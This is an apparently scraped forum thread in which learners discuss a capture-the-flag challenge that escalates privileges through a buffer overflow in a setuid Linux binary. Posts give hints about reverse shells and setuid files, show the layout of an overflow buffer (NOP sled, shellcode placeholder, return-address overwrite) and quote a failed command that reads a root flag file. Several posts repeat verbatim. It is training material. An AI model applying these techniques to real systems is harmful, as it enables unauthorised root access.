I think that I may have lost sight of the buffer overflow part now. The information that i have learned for SUID show mostly abusing running of particular programs that apart of the linux system.
I am weary to elaborate on what i have tried as I dont want to reveal the things that dont work, and get in trouble.
The issue I had was not due to my understanding, it was the use of smart quotes in my command that I was creating. I was using Cherrytree to assemble all of my code and the default in Cherrytree is to use smart quotes. Once I removed the wrong characters and changed my quotes to the right ones it worked. The settings im talking about are in the preferences > Special Characters > uncheck the Smart Quotes
I am also stuck on this, I followed all of the stuff that was taught in the tutorial and I have been reading and watching all different kinds of exploits and have learned a lot of stuff but none of them seem to pertain to this challenge. I note what blueprismo said but I am not sure what I am missing
I don’t want to give you a direct answer at it’s against the rules. But check these points:
1- did you get a reverse shell = (rs)? How?
2- With this rs, what user are you logged in?
3- you know how sticky bits work, right?
4- find the file with the sticky bit set.
5- remember when you are inside gdb and run " $(python -c blablabla)" it’s the same as executing the script with the parameter, as follows: ‘./script $(python -c blablabla)’
I can’t help you more, check these points and I’m sure you will pass
keep me updated.
Hi, could you elaborate on that plz? i got the shell but cant figure out what to do next. Thx
You can only debug a setuid or setgid program if the debugger is running as root. The kernel won't let you call ptrace on a program running with extra privileges. If it did, you would be able to make the program execute anything, which would effectively mean you could e.g. run a root shell by calling a debugger on /bin/su.
So you might need to think of another way to get the shellcode triggered outside GDB
I am also stuck on this, I followed all of the stuff that was taught in the tutorial and I have been reading and watching all different kinds of exploits and have learned a lot of stuff but none of them seem to pertain to this challenge. I note what blueprismo said but I am not sure what I am missing
I don’t want to give you a direct answer at it’s against the rules. But check these points:
1- did you get a reverse shell = (rs)? How?
2- With this rs, what user are you logged in?
3- you know how sticky bits work, right?
4- find the file with the sticky bit set.
5- remember when you are inside gdb and run " $(python -c blablabla)" it’s the same as executing the script with the parameter, as follows: ‘./script $(python -c blablabla)’
I can’t help you more, check these points and I’m sure you will pass
keep me updated.
Hi, could you elaborate on that plz? i got the shell but cant figure out what to do next. Thx
welp, did u get a shell with which user? unprivileged? then… just think how can u get a privileged shell, watch for the files inside the home folder, you got this
Buffer = “\x55” * (1040 - 124 - 95 - 4) = 817 NOPs = “\x90” * 124 Shellcode = “char” EIP = “\x66” * 4 Can Some1 explain me why 124 NOPs are taken? why not more/less than that??? Is this is randomly taken or any calculation is behind that??
I tried multiple ways including this… ./leave_msg $(python -c ‘import os; os.system(“sudo cat /root/flag.txt”)’) Still not roooooooted Can some1 please help me out ???